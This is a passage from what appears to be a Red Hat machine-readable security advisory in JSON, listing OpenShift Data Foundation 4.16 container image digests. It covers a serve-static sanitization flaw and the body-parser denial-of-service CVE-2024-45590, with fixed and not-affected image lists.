"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
